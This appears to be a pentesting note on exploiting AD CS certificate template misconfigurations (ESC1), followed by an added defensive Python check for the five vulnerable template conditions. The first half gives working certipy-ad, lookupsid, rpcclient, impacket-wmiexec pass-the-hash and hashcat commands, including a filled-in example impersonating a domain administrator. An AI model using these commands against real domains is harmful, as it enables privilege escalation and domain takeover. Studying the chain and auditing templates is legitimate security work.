# ADCS

**AD CS (Active Directory Certificate Services)** is the Microsoft service that manages the **PKI (Public Key Infrastructure)** in Active Directory domains.

#### Step 1: Find the ESC

User + hash

```
certipy-ad find -u 'usuario@dominio' -hashes HASH -dc-ip <IP> -enabled -vuln -ldap-scheme ldap -stdout
```


User + password

```
certipy-ad find -u 'usuario@dominio' -p 'password' -dc-ip <IP> -enabled -vuln -ldap-scheme ldap -stdout
```


#### Step 2: Exploit according to the ESC found

**ESC1 - Template with SAN + auto-enroll**

It is based on **impersonating identities with certificates**.


First of all, we need to look up the SID of the user we want to impersonate:

Method 1: impacket-lookupsid

```
lookupsid.py 'DOMINIO/USUARIO:PASSWORD@IP_DC'
```


Method 2: Using RPC

```
rpcclient --user 'DOMINIO/USUARIO' --password 'PASSWORD' <IP> -c "lookupnames administrator"
```


Now we move on to the exploitation itself.

```
certipy-ad req -debug -u 'USUARIO@DOMINIO.COM' -p 'CONTRASEÑA' -hashes 'LM_HASH:NTLM_HASH' -target-ip IP_CA -ca 'NOMBRE_CA' -template 'TEMPLATE_VULNERABLE' -upn 'USUARIO_A_SUPLANTAR@DOMINIO.COM' -sid 'SID_COMPLETO_USUARIO_A_SUPLANTAR'
```

Example:

```
certipy-ad -debug req -u 'tel_engineer01@telecore.ad' -p 'e2b1996aaff0f57bccb916265a77970e' -hashes 'aad3b435b51404eeaad3b435b51404ee:e2b1996aaff0f57bccb916265a77970e' -target-ip 10.5.2.8 -ca 'telecore-PKI-SRV-CA' -template 'Tel_User' -upn 'administrator@telecore.ad' -sid 'S-1-5-21-1588247407-410625039-1511794522-500'
```


Now I use the administrator.pfx certificate to obtain a Kerberos TGT and authenticate as Administrator.


```
impacket-wmiexec -hashes :HASH 'administrator@IP'
```


To crack that hash:

```
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```
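From the defender's side, the ESC1 chain above only works when a template combines five attribute conditions at once. The following Python check, added here as an example and not part of the original notes, evaluates those conditions on template attributes; the template names and attribute values are constructed, and `low_priv_can_enroll` stands in for a template ACL check that is assumed to have been resolved beforehand.

```python
# Audit AD CS certificate templates for the ESC1 attribute conditions.
# Added example, not from the original notes: template names and attribute values
# are constructed, and low_priv_can_enroll stands in for an ACL check assumed done beforehand.
from dataclasses import dataclass, field

# Flag bits as defined in Microsoft's MS-CRTD specification.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag (manager approval)

# EKU OIDs that make a certificate usable for domain (PKINIT) authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

@dataclass
class Template:
    name: str
    name_flag: int        # msPKI-Certificate-Name-Flag
    enrollment_flag: int  # msPKI-Enrollment-Flag
    ra_signatures: int    # msPKI-RA-Signature
    ekus: list = field(default_factory=list)  # pKIExtendedKeyUsage OIDs
    low_priv_can_enroll: bool = False         # assumed: resolved from the template ACL

def esc1_conditions(t: Template) -> list:
    """Return the ESC1 conditions this template meets; all five together mean ESC1."""
    found = []
    if t.low_priv_can_enroll:
        found.append("low-privileged principals hold Enroll rights")
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.append("enrollee supplies the subject / SAN")
    if not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        found.append("no manager approval required")
    if t.ra_signatures == 0:
        found.append("no authorized signatures required")
    if not t.ekus or AUTH_EKUS & set(t.ekus):
        found.append("EKU permits client authentication (empty EKU = any purpose)")
    return found

def is_esc1(t: Template) -> bool:
    return len(esc1_conditions(t)) == 5

# Constructed samples: a misconfigured template and the same one with manager approval on.
SAMPLES = [
    Template("Vuln_User", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], low_priv_can_enroll=True),
    Template("Hardened_User", 0x1, CT_FLAG_PEND_ALL_REQUESTS, 0, ["1.3.6.1.5.5.7.3.2"], True),
]
```

Removing any one condition (enforcing manager approval, clearing the enrollee-supplies-subject flag, or restricting Enroll rights) breaks the chain, which is what the second sample shows.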


